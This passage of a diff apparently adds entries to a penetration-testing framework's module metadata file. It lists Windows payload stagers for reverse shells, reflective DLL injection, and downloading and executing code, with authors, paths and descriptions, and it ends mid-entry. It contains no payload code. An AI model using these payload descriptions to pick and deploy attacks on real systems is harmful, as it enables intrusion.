"check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/custom/reverse_tcp_uuid": { + "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/custom/reverse_udp": { + "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/custom/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "RageLtMan " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": 
"windows/custom/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/custom/reverse_winhttp": { + "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/custom/reverse_winhttps": { + "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": 
"/modules/payloads/stagers/windows/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_windows/dllinject/bind_hidden_ipknock_tcp": { + "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/dllinject/bind_hidden_tcp": { + "name": "Reflective DLL Injection, Hidden Bind TCP Stager", + "fullname": "payload/windows/dllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/dllinject/bind_ipv6_tcp": { + "name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/dllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/dllinject/bind_ipv6_tcp_uuid": { + "name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/dllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": 
"Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/dllinject/bind_named_pipe": { + "name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/dllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/dllinject/bind_nonx_tcp": { + "name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/dllinject/bind_tcp": { + "name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/dllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp" + }, + 
"payload_windows/dllinject/bind_tcp_rc4": { + "name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/dllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/dllinject/bind_tcp_uuid": { + "name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/dllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": 
true, + "ref_name": "windows/dllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/dllinject/find_tag": { + "name": "Reflective DLL Injection, Find Tag Ordinal Stager", + "fullname": "payload/windows/dllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/dllinject/reverse_http": { + "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/dllinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": 
"x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/dllinject/reverse_http_proxy_pstore": { + "name": "Reflective DLL Injection, Reverse HTTP Stager Proxy", + "fullname": "payload/windows/dllinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/dllinject/reverse_ipv6_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/dllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + 
"hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/dllinject/reverse_nonx_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_nonx_tcp" 
+ }, + "payload_windows/dllinject/reverse_ord_tcp": { + "name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "spoonm " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/dllinject/reverse_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager", + "fullname": "payload/windows/dllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/dllinject/reverse_tcp_allports": { + "name": "Reflective DLL Injection, Reverse All-Port TCP Stager", + "fullname": "payload/windows/dllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/dllinject/reverse_tcp_dns": { + "name": "Reflective DLL Injection, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/dllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + 
"platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/dllinject/reverse_tcp_rc4": { + "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/dllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/dllinject/reverse_tcp_rc4_dns": { + "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/dllinject/reverse_tcp_rc4_dns", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/dllinject/reverse_tcp_uuid": { + "name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/dllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/dllinject/reverse_winhttp": { + "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/dllinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/dns_txt_query_exec": { + "name": "DNS TXT Record Payload Download and Execution", + "fullname": "payload/windows/dns_txt_query_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r " + ], + "description": "Performs a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\n option is used as the base name to iterate over. The payload will first request the TXT contents of the a\n hostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n 255 bytes from it are copied into a buffer that is eventually executed. 
This buffer should be encoded using\n x86/alpha_mixed with the BufferRegister option set to EDI.", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", + "is_install_path": true, + "ref_name": "windows/dns_txt_query_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/download_exec": { + "name": "Windows Executable Download (http,https,ftp) and Execute", + "fullname": "payload/windows/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "corelanc0d3r " + ], + "description": "Download an EXE from an HTTP(S)/FTP URL and execute it", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/download_exec.rb", + "is_install_path": true, + "ref_name": "windows/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/exec": { + "name": "Windows Execute Command", + "fullname": "payload/windows/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
